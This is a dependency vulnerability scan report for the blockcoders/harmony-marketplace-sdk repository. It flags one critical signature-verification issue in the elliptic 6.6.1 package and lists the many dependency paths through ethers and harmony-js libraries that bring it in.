Skip to main content

Test Results

blockcoders/harmony-marketplace-sdk

Vulnerabilities

 1 via 99 paths

Dependencies

 112

Source

 GitHub

Commit

 83859173

Find, fix and prevent vulnerabilities in your code.

Test and protect my applications
Severity
  • 1
Status
  • 1
  • 0
  • 0

critical severity

Improper Verification of Cryptographic Signature

  • Vulnerable module: elliptic
  • Introduced through: @ethersproject/wallet@5.8.0, @harmony-js/transaction@0.1.58 and others

Detailed paths

  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @ethersproject/wallet@5.8.0 @ethersproject/signing-key@5.8.0 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/contract@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @ethersproject/contracts@5.8.0 @ethersproject/transactions@5.8.0 @ethersproject/signing-key@5.8.0 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @ethersproject/providers@5.8.0 @ethersproject/transactions@5.8.0 @ethersproject/signing-key@5.8.0 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @ethersproject/wallet@5.8.0 @ethersproject/transactions@5.8.0 @ethersproject/signing-key@5.8.0 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @ethersproject/wallet@5.8.0 @ethersproject/hdnode@5.8.0 @ethersproject/signing-key@5.8.0 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/contract@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/account@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @ethersproject/abstract-signer@5.8.0 @ethersproject/abstract-provider@5.8.0 @ethersproject/transactions@5.8.0 @ethersproject/signing-key@5.8.0 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @ethersproject/contracts@5.8.0 @ethersproject/abstract-provider@5.8.0 @ethersproject/transactions@5.8.0 @ethersproject/signing-key@5.8.0 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @ethersproject/providers@5.8.0 @ethersproject/abstract-provider@5.8.0 @ethersproject/transactions@5.8.0 @ethersproject/signing-key@5.8.0 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @ethersproject/wallet@5.8.0 @ethersproject/abstract-provider@5.8.0 @ethersproject/transactions@5.8.0 @ethersproject/signing-key@5.8.0 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @ethersproject/wallet@5.8.0 @ethersproject/hdnode@5.8.0 @ethersproject/transactions@5.8.0 @ethersproject/signing-key@5.8.0 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @ethersproject/wallet@5.8.0 @ethersproject/json-wallets@5.8.0 @ethersproject/transactions@5.8.0 @ethersproject/signing-key@5.8.0 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @ethersproject/wallet@5.8.0 @ethersproject/json-wallets@5.8.0 @ethersproject/hdnode@5.8.0 @ethersproject/signing-key@5.8.0 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/contract@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/account@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/account@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @ethersproject/contracts@5.8.0 @ethersproject/abstract-signer@5.8.0 @ethersproject/abstract-provider@5.8.0 @ethersproject/transactions@5.8.0 @ethersproject/signing-key@5.8.0 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @ethersproject/providers@5.8.0 @ethersproject/abstract-signer@5.8.0 @ethersproject/abstract-provider@5.8.0 @ethersproject/transactions@5.8.0 @ethersproject/signing-key@5.8.0 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @ethersproject/wallet@5.8.0 @ethersproject/abstract-signer@5.8.0 @ethersproject/abstract-provider@5.8.0 @ethersproject/transactions@5.8.0 @ethersproject/signing-key@5.8.0 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @ethersproject/wallet@5.8.0 @ethersproject/json-wallets@5.8.0 @ethersproject/hdnode@5.8.0 @ethersproject/transactions@5.8.0 @ethersproject/signing-key@5.8.0 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/contract@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/account@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/account@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @ethersproject/providers@5.8.0 @ethersproject/hash@5.8.0 @ethersproject/abstract-signer@5.8.0 @ethersproject/abstract-provider@5.8.0 @ethersproject/transactions@5.8.0 @ethersproject/signing-key@5.8.0 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @ethersproject/wallet@5.8.0 @ethersproject/hash@5.8.0 @ethersproject/abstract-signer@5.8.0 @ethersproject/abstract-provider@5.8.0 @ethersproject/transactions@5.8.0 @ethersproject/signing-key@5.8.0 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @ethersproject/wallet@5.8.0 @ethersproject/hdnode@5.8.0 @ethersproject/abstract-signer@5.8.0 @ethersproject/abstract-provider@5.8.0 @ethersproject/transactions@5.8.0 @ethersproject/signing-key@5.8.0 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @ethersproject/wallet@5.8.0 @ethersproject/json-wallets@5.8.0 @ethersproject/abstract-signer@5.8.0 @ethersproject/abstract-provider@5.8.0 @ethersproject/transactions@5.8.0 @ethersproject/signing-key@5.8.0 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/account@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/account@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @ethersproject/contracts@5.8.0 @ethersproject/abi@5.8.0 @ethersproject/hash@5.8.0 @ethersproject/abstract-signer@5.8.0 @ethersproject/abstract-provider@5.8.0 @ethersproject/transactions@5.8.0 @ethersproject/signing-key@5.8.0 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @ethersproject/wallet@5.8.0 @ethersproject/wordlists@5.8.0 @ethersproject/hash@5.8.0 @ethersproject/abstract-signer@5.8.0 @ethersproject/abstract-provider@5.8.0 @ethersproject/transactions@5.8.0 @ethersproject/signing-key@5.8.0 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @ethersproject/wallet@5.8.0 @ethersproject/json-wallets@5.8.0 @ethersproject/hdnode@5.8.0 @ethersproject/abstract-signer@5.8.0 @ethersproject/abstract-provider@5.8.0 @ethersproject/transactions@5.8.0 @ethersproject/signing-key@5.8.0 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/account@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @ethersproject/wallet@5.8.0 @ethersproject/hdnode@5.8.0 @ethersproject/wordlists@5.8.0 @ethersproject/hash@5.8.0 @ethersproject/abstract-signer@5.8.0 @ethersproject/abstract-provider@5.8.0 @ethersproject/transactions@5.8.0 @ethersproject/signing-key@5.8.0 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
